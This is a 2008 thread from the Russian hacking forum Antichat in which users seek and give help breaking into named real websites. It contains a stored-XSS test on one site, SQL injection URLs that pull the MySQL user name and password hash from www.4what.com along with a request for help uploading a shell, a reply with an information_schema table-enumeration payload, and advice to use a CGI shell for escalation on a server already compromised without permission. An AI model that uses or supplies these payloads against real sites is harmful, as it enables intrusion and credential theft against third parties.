HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 18.08.2008, 07:03
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
С нами: 9851426

Репутация: 3908
По умолчанию

Цитата:
Сообщение от Cry Wolf  
Возник такой вопрос. Ввел в строку имени в коментах к статьям привычный <script>alert()</script>, имя в комментарии не отобразилось, а при каждом входе на страницу теперь опера выдает уведомление о выполнении джава скрипта... Это активная XSS?

Вот ссылка http://gayby.org/news/comments/192.html
Да, там кстати кавычки фильтруются.

Цитата:
Сообщение от krypt3r  
А точка с запятой?
Нет, не путай MySQL5 и MSSQL

Последний раз редактировалось Ded MustD!e; 18.08.2008 в 07:11..
 
Ответить с цитированием

  #2  
Старый 18.08.2008, 09:56
Shaitan-Devil
Участник форума
Регистрация: 15.08.2008
Сообщений: 167
С нами: 9336002

Репутация: 204
По умолчанию

Мож кто -нибудь осветит мой вопрос по mod_rewrite?
Вот уязвимый скрипт
Код:
http://www.savchenko.ru/developments/84.html
 
Ответить с цитированием

  #3  
Старый 18.08.2008, 10:01
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
С нами: 9851426

Репутация: 3908
По умолчанию

Цитата:
Сообщение от Shaitan-Devil  
Мож кто -нибудь осветит мой вопрос по mod_rewrite?
Вот уязвимый скрипт
Код:
http://www.savchenko.ru/developments/84.html
Невижу вопроса. /85-1.html уязвимость есть.
 
Ответить с цитированием

  #4  
Старый 18.08.2008, 10:12
Shaitan-Devil
Участник форума
Регистрация: 15.08.2008
Сообщений: 167
С нами: 9336002

Репутация: 204
По умолчанию

Вопрос не в этом вопрос в том как это обходить!Он просто выводит пустую страницу,при обычных запросах,здесь нужен посимв.перебор?
 
Ответить с цитированием

www.4what.com
  #5  
Старый 18.08.2008, 21:49
\\cRAcKEr//
Новичок
Регистрация: 17.08.2008
Сообщений: 4
С нами: 9333054

Репутация: 1
По умолчанию www.4what.com

Здравствуйте! Я долго копался на этом форуме и нашел где мне помогут насчет SQL-инъекции на сайте
Site:www.4what.com
Зайдя на https://www.4what.com/news.php?id=55' появилась ошибка:
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/fwhat/public_html/news.php on line 149
Далее зашел на
http://www.4what.com/news.php?id=-1+union+select+1,2,user+from+mysql.user/*
высветилось логин:4what
потом
http://www.4what.com/news.php?id=-1+union+select+null,mysql.user.password,null+from+ mysql.user/*
высветилось хэш:*832547126835E90D7CCB5772A85B0E6552904217
(а зачем звездочка?)
Дальше не знаю
Можно ли этот хэш поменять на свой? И какой командой(UPDATE? не получается че то)
И последний вопрос Подскажите что надо сделать что бы загрузитьт туда шелл
Спасибо вам за ответы кто ответит....
 
Ответить с цитированием

  #6  
Старый 18.08.2008, 06:58
krypt3r
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
С нами: 10021597

Репутация: 905


По умолчанию

Цитата:
Это майскуль, разделение запросов в ней отсутствует
А точка с запятой?
 
Ответить с цитированием

  #7  
Старый 18.08.2008, 22:16
Ch3ck
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
С нами: 10485026

Репутация: 1879


По умолчанию

Там версия пятая. Какие проблемы?
table_name+from+information_schema.tables+limit+1, 1/*
И поехали...
 
Ответить с цитированием

  #8  
Старый 18.08.2008, 23:27
\\cRAcKEr//
Новичок
Регистрация: 17.08.2008
Сообщений: 4
С нами: 9333054

Репутация: 1
По умолчанию

Спасибо Ch3ck за помощь!
 
Ответить с цитированием

  #9  
Старый 19.08.2008, 00:38
sher_or_wer
Новичок
Регистрация: 13.08.2008
Сообщений: 6
С нами: 9338708

Репутация: 0
По умолчанию

Народ help плиз. Вообщем тема такая на одном сервере *nix я залил shell но доступ имею только к своей папке и всё большинство опций разрешено, но я так как новичек не шибко могу сам пользоваться командами так как незнаю, я проверил все программы на уязвимость но админ следит за апргрейдами и постоянно обновляет. Я всегда пользовался эксплоитами и этого хватало пока, но теперь что делать только через брут или можно попробовать какие либо команды.
З.Ы. К папке этого пользователя под кем я зашел имею полный доступ.
 
Ответить с цитированием

  #10  
Старый 19.08.2008, 03:33
BlackSun
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
С нами: 10058786

Репутация: 4589


По умолчанию

Цитата:
Сообщение от sher_or_wer  
Народ help плиз. Вообщем тема такая на одном сервере *nix я залил shell но доступ имею только к своей папке и всё большинство опций разрешено, но я так как новичек не шибко могу сам пользоваться командами так как незнаю, я проверил все программы на уязвимость но админ следит за апргрейдами и постоянно обновляет. Я всегда пользовался эксплоитами и этого хватало пока, но теперь что делать только через брут или можно попробовать какие либо команды.
З.Ы. К папке этого пользователя под кем я зашел имею полный доступ.
Попробуй cgi шелл .. (теги: telnet.cgi)
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.